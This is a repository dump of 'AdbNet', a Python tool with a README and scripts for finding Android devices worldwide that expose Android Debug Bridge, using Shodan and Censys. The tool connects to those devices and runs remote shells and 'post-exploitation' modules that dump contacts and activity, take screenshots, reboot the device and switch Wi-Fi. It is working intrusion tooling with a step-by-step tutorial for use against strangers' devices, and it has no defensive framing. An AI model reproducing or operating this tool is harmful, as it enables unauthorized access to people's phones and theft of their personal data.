├── extra └── fetch.py ├── README.md └── adbnet.py /extra/fetch.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | 4 | shodankey = "" # add your key here 5 | 6 | ip_req = requests.get(f"https://api.shodan.io/shodan/host/search?key={shodankey}&query=android+debug+bridge").text 7 | print(ip_req) 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | adb - An exploitation tool for android devices. 4 |

5 |

6 | A tool that allows you to search for vulnerable android devices across the world and exploit them. 7 |

8 | 9 |

10 | 11 | Version 12 |

13 | 14 | # Features 15 | ``` 16 | Features: 17 | - Post-Exploitation modules to control and tinker with the device you are connected to. 18 | - Scanners to search for vulnerable android devices across the world to exploit. 19 | - Options for managing how many devices you have connected. 20 | - Options for checking whether the devices you are connected to are online or offline. 21 | - IP-Lookup for retrieving information on a certain IP. 22 | - Options to dump the IP Addresses of the vulnerable android devices. [This makes your life easier so you dont have to find it yourself] 23 | ``` 24 | 25 | # Getting the required API keys 26 | Create an account on censys.io and then go to your account page and get your free api_id and api_secret key and open 'adbnet.py' and edit in your api id and api key here: 27 | 28 | ![image](https://user-images.githubusercontent.com/86132648/124665489-c6588b00-de7a-11eb-984b-b9e3118aba81.png) 29 | 30 | Create an account on shodan.io and go to your account to get your free api key, once you have it copied, open 'adbnet.py' and edit in your api key here: 31 | ![image](https://user-images.githubusercontent.com/86132648/124665543-d7090100-de7a-11eb-9ef6-e400227a1359.png) 32 | 33 | # Simple Tutorial 34 | ``` 35 | First, run the 'dump shodan' or 'dump censy' (dump shodan is recommended) command to 36 | dump the IP addresses of the vulnerable devices. 37 | 38 | Then, after you find an IP-address you want to try, run the 'connect' command and you will be prompted to enter 39 | the target IP address, once you enter the target ip address, you will be prompter to enter the port. For the port, 40 | you can try entering '5555' or '4444' since those are the most common ports. If you want, you can try finding the 41 | specific port yourself, but it might take some time. 42 | 43 | Now AdbNet will now try to connect to the vulnerable android device. 44 | If it fails to connect, try another IP. 45 | 46 | If you manage to connect to a device, now you can check if you are really connected by using the 'devices' command. 47 | 48 | < Warning! > You can only be connected to one device at a time! To kill the sessions use the 'killall' command! < Warning! > 49 | 50 | To open a shell and execute commands on the device, use the 'terminal' command. 51 | 52 | To run post-exploitation modules, run the 'post' command for the post-exploitation menu to load. Then, you 53 | can run any module you like. 54 | 55 | REMEMBER: IF YOU WANT TO CONNECT TO A DIFFERENT DEVICE, RUN THE 'killall' COMMAND, AND REPEAT THE PROCESS AGAIN. 56 | ``` 57 | 58 | # Installation/How To Run 59 | ``` 60 | sudo apt install pq 61 | sudo apt install adb 62 | pip3 install colorama 63 | pip3 install requests 64 | python3 adbnet.py or python adbnet.py or py adbnet.py 65 | 66 | TIP: For people that are new to this, if you are having issues install a certain python module, just do this: pip3 install 67 | ``` 68 | # Screenshots 69 | ![image](https://user-images.githubusercontent.com/86132648/124667060-e2f5c280-de7c-11eb-8f69-2443aa7a7bd3.png) 70 | ![image](https://user-images.githubusercontent.com/86132648/124667104-f30da200-de7c-11eb-9da3-098fa211a910.png) 71 | 72 | ## Credits 73 | ``` 74 | https://github.com/0x1CA3 75 | ``` 76 | ### Contributions 🎉 77 | ###### All contributions are accepted, simply open an Issue / Pull request. 78 | -------------------------------------------------------------------------------- /adbnet.py: -------------------------------------------------------------------------------- 1 | try: 2 | import os 3 | import re 4 | import socket 5 | import pathlib 6 | import requests 7 | import subprocess 8 | from time import sleep 9 | from colorama import Fore 10 | from datetime import datetime 11 | except: 12 | print("[-] Error! Make sure you install the required modules!") 13 | 14 | 15 | shodan_key = "" # Add your Shodan API Key here 16 | api_id = "" # Add your Censys API ID here 17 | api_secret = "" # Add your Censys API Secret Key here 18 | 19 | 20 | # AdbNet 21 | # Date: 07/06/21 22 | # Author: https://github.com/0x1CA3 23 | 24 | 25 | cur = datetime.now() 26 | clear_screen = lambda: os.system("cls" if os.name == "nt" else "clear") 27 | current_time = cur.strftime("%m/%d/%Y, %H:%M:%S") 28 | leave = lambda: exit() 29 | computer_name = socket.gethostname() 30 | 31 | class other(): 32 | def help_menu(): 33 | helpmain = f""" 34 | {Fore.GREEN}Commands Description 35 | {Fore.GREEN}-------- ----------- 36 | {Fore.RED}help Displays help commands. 37 | {Fore.RED}info Lets you retrieve information on a specified device. 38 | {Fore.RED}post Loads post-exploitation modules for connected android devices. 39 | {Fore.RED}shell Lets you execute a system command. 40 | {Fore.RED}banner Displays the banner. 41 | {Fore.RED}other Displays other/extra commands. 42 | {Fore.RED}clear Clears the screen. 43 | {Fore.RED}exit Exits. 44 | 45 | {Fore.GREEN}ADB Options [Remote-Access] Description 46 | {Fore.GREEN}----------- ----------- 47 | {Fore.RED}adb Lets you execute your own custom commands for ADB. 48 | {Fore.RED}install Installs ADB if you don't already have it installed. 49 | {Fore.RED}connect Lets you connect to a specific device. 50 | {Fore.RED}devices Lists the devices YOU are currently connected to. 51 | {Fore.RED}command Lets you execute a command without opening a shell. 52 | {Fore.RED}terminal Opens up a shell. [Use the 'exit' command to return back to the Framework] 53 | {Fore.RED}killall Kills all sessions. 54 | 55 | {Fore.GREEN}Scanner Options Description 56 | {Fore.GREEN}--------------- ----------- 57 | {Fore.RED}scan shodan Uses shodan to search for vulnerable devices. [This is the default scanner] 58 | {Fore.RED}scan censy Uses censys to search for vulnerable devices. 59 | """ 60 | print(helpmain) 61 | 62 | def banner(): 63 | clear_screen() 64 | a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text 65 | clea = a.replace('''{"matches": [], "total":''', '') 66 | cleanr = clea.replace('''}''', '') 67 | banr = f""" 68 | {Fore.RED} ▄▄▄ ▓█████▄ ▄▄▄▄ ███▄ █ ▓█████▄▄▄█████▓ {Fore.GREEN}[+] Logged in as: {computer_name} 69 | {Fore.RED}▒████▄ ▒██▀ ██▌▓█████▄ ██ ▀█ █ ▓█ ▀▓ ██▒ ▓▒ {Fore.GREEN}[+] Devices available:{cleanr} 70 | {Fore.RED}▒██ ▀█▄ ░██ █▌▒██▒ ▄██ ▓██ ▀█ ██▒▒███ ▒ ▓██░ ▒░ {Fore.GREEN}[+] Time: {current_time} 71 | {Fore.RED}░██▄▄▄▄██ ░▓█▄ ▌▒██░█▀ ▓██▒ ▐▌██▒▒▓█ ▄░ ▓██▓ ░ {Fore.GREEN}[+] Made by: https://github.com/0x1CA3 72 | {Fore.RED} ▓█ ▓██▒░▒████▓ ░▓█ ▀█▓ ▒██░ ▓██░░▒████▒ ▒██▒ ░ {Fore.GREEN}[+] The most common ports are 5555 and 4444! 73 | {Fore.RED} ▒▒ ▓▒█░ ▒▒▓ ▒ ░▒▓███▀▒ ░ ▒░ ▒ ▒ ░░ ▒░ ░ ▒ ░░ {Fore.GREEN}[+] Use 'help' or '?' for commands! 74 | {Fore.RED} ▒ ▒▒ ░ ░ ▒ ▒ ▒░▒ ░ ░ ░░ ░ ▒░ ░ ░ ░ ░ 75 | {Fore.RED} ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 76 | {Fore.RED} ░ ░ ░ ░ ░ ░ ░ 77 | {Fore.RED} ░ ░ 78 | """ 79 | print(banr) 80 | 81 | def help_other(): 82 | otherhelp = f""" 83 | {Fore.GREEN}Dump Options Description 84 | {Fore.GREEN}------------ ----------- 85 | {Fore.RED}dump shodan Attempts to dump IP addresses of the vulnerable devices. [Shodan] 86 | {Fore.RED}dump censy Attempts to dump IP addresses of the vulnerable devices. [Censy] 87 | """ 88 | print(otherhelp) 89 | 90 | def post_help(): 91 | helppost = f""" 92 | [Reminder: Make sure you are already connected to a device! You can check if you are by using the 'devices' command.] 93 | 94 | {Fore.GREEN}Post-Exploitation-Modules Description 95 | {Fore.GREEN}------------------------- ----------- 96 | {Fore.RED}battery Retrieves the devices battery information. 97 | {Fore.RED}net_enable Enables Wi-Fi remotely on the device. 98 | {Fore.RED}net_disable Disables Wi-Fi remotely on the device. 99 | {Fore.RED}screenshot Takes a screenshot remotely on the device. 100 | {Fore.RED}reboot Remotely reboots the device. 101 | {Fore.RED}dump_contacts Remotely dumps the stored contacts on the device. 102 | {Fore.RED}dump_activity Retrieves the phones activity. 103 | """ 104 | print(helppost) 105 | 106 | def terminal(): 107 | while True: 108 | term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@terminal]~# ") 109 | if term == "back" or term == "exit": cli() 110 | else: os.system(f"{term}") 111 | 112 | def adb_terminal(): 113 | while True: 114 | adb_term = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adb]~# ") 115 | if adb_term == "back" or adb_term == "exit": cli() 116 | else: os.system(f"adb {adb_term}") 117 | 118 | def fetch_device_ip(): 119 | os.system("python extra/fetch.py > extra/ip.txt") 120 | os.system("python3 extra/fetch.py > extra/ip.txt") 121 | fetchipfile = open("extra/ip.txt", "r") 122 | datafetch = fetchipfile.readlines() 123 | print(f"{Fore.GREEN}[+] Attempting to dump data...") 124 | sleep(0.10) 125 | for line in datafetch: 126 | if "ip_str" or "host" in line: 127 | print(f'''{Fore.GREEN}[+] Fetched information! 128 | -------------------------------- 129 | {line}''') 130 | else: 131 | print(f"{Fore.RED}[-] Error! Could not fetch IP addresses!") 132 | 133 | def censys_scan_device(): 134 | if os.name == "nt": 135 | os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''') 136 | else: 137 | os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''') 138 | censydata = open("extra/data.json", "r") 139 | datext = censydata.readlines() 140 | for line in datext: 141 | if "total" in line: 142 | cenip = line 143 | cenipclean = cenip.replace('''"''', '') 144 | cencleanerip = cenipclean.replace(":", '') 145 | cenclenfinal = cencleanerip.replace(",", '') 146 | censuperipclean = re.sub('[a-z]', '', cenclenfinal) 147 | print(f"\n{Fore.GREEN}[+] Devices available: " + censuperipclean) 148 | 149 | def censys_dump_ip(): 150 | if os.name == "nt": 151 | os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret}''') 152 | else: 153 | os.system(f'''curl -G 'https://search.censys.io/api/v2/hosts/search' --data-urlencode "q='Android Debug Bridge'" -u {api_id}:{api_secret} | jq '.' > extra/data.json''') 154 | censydata = open("extra/data.json", "r") 155 | datext = censydata.readlines() 156 | for line in datext: 157 | if "ip" in line: 158 | cenip1 = line 159 | cenipclean1 = cenip1.replace('''"''', '') 160 | cencleanerip1 = cenipclean1.replace(":", '') 161 | cenclenfinal1 = cencleanerip1.replace(",", '') 162 | censuperipclean1 = re.sub('[a-z]', '', cenclenfinal1) 163 | print(f"{Fore.GREEN}[+] IP Address dumped! -" + censuperipclean1) 164 | 165 | class handler(): 166 | def __init__(self, command): 167 | self.shell = command 168 | 169 | def device_check_shodan(): 170 | print("Checking devices...") 171 | sleep(0.5) 172 | a = requests.get(f'''https://api.shodan.io/shodan/host/count?key={shodan_key}&query=android+debug+bridge''').text 173 | clean = a.replace('''{"matches": [], "total":''', '') 174 | cleaner = clean.replace('''}''', '') 175 | print(f"{Fore.GREEN}\n[+]{cleaner} Devices available!\n") 176 | 177 | cmds = \ 178 | { 179 | "help": other.help_menu, 180 | "?": other.help_menu, 181 | "dump shodan": other.fetch_device_ip, 182 | "dump censy": other.censys_dump_ip, 183 | "clear": clear_screen, 184 | "post": other.post_help, 185 | "shell": other.terminal, 186 | "scan shodan": device_check_shodan, 187 | "scan censy": other.censys_scan_device, 188 | "banner": other.banner, 189 | "other": other.help_other, 190 | "exit": leave, 191 | "adb": other.adb_terminal 192 | } 193 | 194 | postexp = \ 195 | { 196 | "battery": "adb shell dumpsys battery", 197 | "net_enable": "adb shell svc wifi enable", 198 | "net_disable": "adb shell svc wifi disable", 199 | "screenshot": "adb shell screencap /sdcard/sspwned.png", 200 | "reboot": "adb reboot", 201 | "dump_contacts": "adb shell content query --uri content://contacts/phones/ --projection display_name:number", 202 | "dump_activity": "adb shell dumpsys activity" 203 | } 204 | 205 | adb_cmds = \ 206 | { 207 | "install": "sudo apt install adb", 208 | "devices": "adb devices", 209 | "terminal": "adb shell", 210 | "killall": "adb kill-server" 211 | } 212 | 213 | def device_information(android_device): 214 | print("Fetching information on device...") 215 | sleep(0.5) 216 | try: 217 | b = requests.get(f'''https://api.shodan.io/shodan/host/{android_device}?key={shodan_key}''') 218 | print(f"{Fore.GREEN}[+] Information Fetched!") 219 | print(b.text) 220 | except: 221 | print(f"{Fore.RED}[-] Failed to retrieve information about the specified device!") 222 | 223 | def extra_run(self): 224 | if self.shell == "info": 225 | android_device = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ") 226 | handler.device_information(android_device) 227 | elif self.shell == "connect": 228 | adb_connect = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter an IP]~# ") 229 | adb_port = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a Port]~# ") 230 | print("[+] Starting...") 231 | sleep(0.4) 232 | os.system(f"adb connect {adb_connect}:{adb_port}") 233 | elif self.shell == "command": 234 | adb_command = input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[Enter a command]~# ") 235 | os.system(f"adb shell {adb_command}") 236 | else: 237 | print(f"{Fore.RED}Error! Command [{self.shell}] was not found!") 238 | 239 | def cmd(self, cmds=cmds, adb_cmds=adb_cmds, postexp=postexp): 240 | if self.shell in cmds: 241 | try: 242 | cmds[self.shell]() 243 | except: 244 | print(f"{Fore.RED}[-] Failed to properly execute command!") 245 | elif self.shell in adb_cmds: 246 | try: 247 | subprocess.call(adb_cmds[self.shell], shell=True) 248 | except: 249 | print(f"{Fore.RED}[-] Failed to properly execute command!") 250 | elif self.shell in postexp: 251 | try: 252 | subprocess.call(postexp[self.shell], shell=True) 253 | except: 254 | print(f"{Fore.RED}[-] Failed to properly execute command!") 255 | else: 256 | handler.extra_run(self) 257 | 258 | def cli(): 259 | while True: 260 | shell = handler(input(f"{Fore.GREEN}({pathlib.Path().resolve()})-[user@adbnet]~# ")) 261 | shell.cmd() 262 | 263 | if __name__ == "__main__": 264 | try: 265 | other.banner() 266 | cli() 267 | except KeyboardInterrupt as interrupt: 268 | exit(interrupt) --------------------------------------------------------------------------------